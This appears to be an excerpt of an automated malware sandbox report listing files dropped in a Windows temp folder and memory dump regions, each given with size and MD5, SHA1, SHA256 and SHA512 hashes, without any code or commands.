Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ip.txt

Filesize
1023B

MD5
b05a1c12f9823ba2273db306ad6969ca

SHA1
5c8f8b93cb5d3b39cc6a3aa2f2025fbe76f9c3e3

SHA256
96e2f892f357b351369232d9e48503708b30b572206048522377d99dc5a57754

SHA512
0b363c9d5f7305adb26d31e9505aaa74ac90459eb1d80b446a886619e40ea5104084d06030fbb034a068b27c65475938409bf8b7d0c228c65b5a06eba149c281

Download Submit
C:\Users\Admin\AppData\Local\Temp\ipp.txt

Filesize
13B

MD5
907326301a53876360553d631f2775c4

SHA1
e900c12c18a7295611f3e2234bc68e8dc0501e06

SHA256
d5543b3a5715587c9c0993a7f56f3e1ee445af837f62c38f2f3457a2ea8d00c8

SHA512
435c1fd96b79b70c370d6f769d44eca3e682404189ff42a6b5718c21bf9dc8358d72c115d68dc25014b8cb9c709af0e64de012103fce687cf4a340fa8f3ea2aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\kimygh.cmd

Filesize
19KB

MD5
eab6a95116ccf26821aa9461e25f7316

SHA1
e89071f98e3e0eef114afdc360b4de1222b22565

SHA256
a181dce20294c82cf71700051bf7d787bddf4e08ec4363235b45f8aad1d7dfba

SHA512
961ed5060f0594d4bb07619d044401e2b4525f16c2be6e2fe94becc5d37727de6da5abba4ec36134a13b046a178b4ee3129016c2f559534227da57d8de7e3f78

Download Submit
C:\Users\Admin\AppData\Local\Temp\netstat.txt

Filesize
3KB

MD5
36022c163e1502a7893c2e6716143cdf

SHA1
0c6a258803f86e6c4f3a10b7e846d630a4c0f150

SHA256
9252e017efc1a6adb8128b9ad30ad17ac60cd8f3801af9b974e88f3ec2b298a6

SHA512
b682db43f39f4091334d8bc664310bd0bf8bd7f68f2b51d1957b3446c7817abbcc5bd3127a0491ecc4e223ef4cc6cfbb2e26527fe6c7cca81373bd0be9098e6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\netstat.txt

Filesize
3KB

MD5
ce0356e0c2ef34df01e3c0e7ded1f962

SHA1
8f4df6b1b973bf143e6bfa69896378da1f8f0768

SHA256
f6557a84de4f1111ecb381888498f00f816704d8b21a86ded465809a057e97da

SHA512
6be3901a0b96ac976d275fd65208ab28c02963b7f572822c6e5b09a081a2998294190b3d58580807d1d540eb6bdd27dc00a3a956a7d990db60fe772bc966e8b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\programms.txt

Filesize
9KB

MD5
ac0567025db7639b7a046d0b18577eb3

SHA1
da01ce5afef785703177722159ee40dd19f4ead7

SHA256
512f72f068b30c8edb9570605903725159b2b691c5ad8b0f431637ce83c02906

SHA512
c67b2e05e9267ca823c334c3d406a357d718d3b413b78e702ca81da1835d91cc1df9629c572fa2301571a31221dbc7218e8b83a5e63016a2cc15b5211ed055f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\rzcztg.cmd

Filesize
19KB

MD5
22740ad81d682458e040958ad3b1a50e

SHA1
7ab6ef506f13c6ca90b5e2695bb24e59dbeec444

SHA256
4df436b2d6c12bb673bd244c9165cbeee0f2a0932f0f4d35ca4d733f6090a850

SHA512
0ab4267d78aee3ae6dc10a4bc2e39d1f529f64d9edb5c79e43f33a176d7e6424522925aa3af83f03c9dc622ea440bd8a73b17715fa4abbaaf2b7f8825e62b3be

Download Submit
C:\Users\Admin\AppData\Local\Temp\sysi.txt

Filesize
2KB

MD5
544890eb48c13dae0fe7a6ada53f26f5

SHA1
a647716a17568bb661a4cffdb93cc242f55f445a

SHA256
0e7f3fb69e68efb3b8aa51dfea8cce8617733447f0462131a0eda9ce7212e01b

SHA512
7e82e228e26fefcfed9ec16a4313d88f6ad8ec9cddc884a7935a209336e671395a5453db00d15042bdac98cdf997d54a078d2f7efa0cf6d80304a8e690de1a07

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.ps1

Filesize
1KB

MD5
988c88005a53c9d59818925385eb9a9b

SHA1
ad495e5bee3fd54c0c8f69df7d6bed2d9c672392

SHA256
ba08761287e9a5a33b8f553ddd7d856d0636815210d3dec4dcbbe2911c39fb85

SHA512
51df73c09c47a97c52b006ef4bf9e378e0248f760d16bc87008fe82b60b6e4a5be81121e6c1160643a3806073c059abfc535c9d00efa61766d717ddb8edde48b

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.ps1

Filesize
1KB

MD5
2ad326dc354c4475e739a62b1923e735

SHA1
17d03a44e71854d49c59d1072fbe8f5b73284da2

SHA256
cd85a82d209c197cadfc9fb025650950c65c354bae665f0ef97c1bcf36240f22

SHA512
3bd0c53808876ee26a43d2331e79f0466d58605dc8e8e92ea049d5ae4e07fab2f947591234adff614122b4917f47e7e2757e521acf6f0bde4adf2f9a568834ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\testtttt.ps1

Filesize
2KB

MD5
795b952ae52327949b7925058a546a61

SHA1
6a09af9cd52d229449e5d1c2a45be99e7a2b093f

SHA256
f348c9d9634037b5c09fe03ef1c5adc6889ad454cf678ced6b7be554a68da566

SHA512
d881c1df8a74fea676681c123c67d3bc5b6ac250c290a5d5a8c8fdd3858bbaedcab7ebd1aa4574f833516ecd35710eabeb52d0dea627d1632c93823ed0ceff8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\testtttt.ps1

Filesize
2KB

MD5
563004b225ba3f21165d3347cbba0ade

SHA1
7c95a4576086f5f54bf3344798b79b2ccbd6f135

SHA256
b1169a6ee12fe496feb3e2a69c1f893ee52204f353cad0bd9e11143d4d264189

SHA512
2566ee7c170414d9b0b16424ade477b0003aa085c1dc444f4aa9efde9732f73b1032f5052af3121aff8fcfb7cd3e2c69ce1a24a3af7b27f917d2cc1a26416bae

Download Submit
C:\Users\Admin\AppData\Local\Temp\uuid.txt

Filesize
6B

MD5
bea07e6d2b8dce396fe21baa61b34956

SHA1
665332b36fc8fa1ed11210cdee83b639b451e592

SHA256
2e08d1f6000aef541797d008c05ac36f4dbebfb36cbac5615788e6fcc5b300a7

SHA512
4ad82fbef6d8d3f4d0b90a9399c8b405674bad0c750e385fb034e57895838fd26d7926f6ed0ccab2e2afcaf4a23613ed8f16d909bff870b40187e22e0a6362c1

Download Submit
memory/1152-17-0x0000022EF9480000-0x0000022EF94A2000-memory.dmp

Filesize
136KB

Download
memory/2344-148-0x0000016FD4980000-0x0000016FD5126000-memory.dmp

Filesize
7.6MB

Download
memory/2344-147-0x0000016FD3CA0000-0x0000016FD41C8000-memory.dmp

Filesize
5.2MB

Download
memory/2344-146-0x0000016FD35A0000-0x0000016FD3762000-memory.dmp

Filesize
1.8MB

Download
memory/4760-0-0x00007FFE024B3000-0x00007FFE024B5000-memory.dmp

Filesize
8KB

Download
memory/4760-5-0x0000000002FD0000-0x0000000002FDC000-memory.dmp

Filesize
48KB

Download
memory/4760-4-0x00007FFE024B0000-0x00007FFE02F72000-memory.dmp

Filesize
10.8MB

Download
memory/4760-3-0x00007FFE024B3000-0x00007FFE024B5000-memory.dmp

Filesize
8KB

Download
memory/4760-2-0x00007FFE024B0000-0x00007FFE02F72000-memory.dmp

Filesize
10.8MB

Download
memory/4760-1-0x0000000000DD0000-0x0000000000DDE000-memory.dmp

Filesize
56KB

Download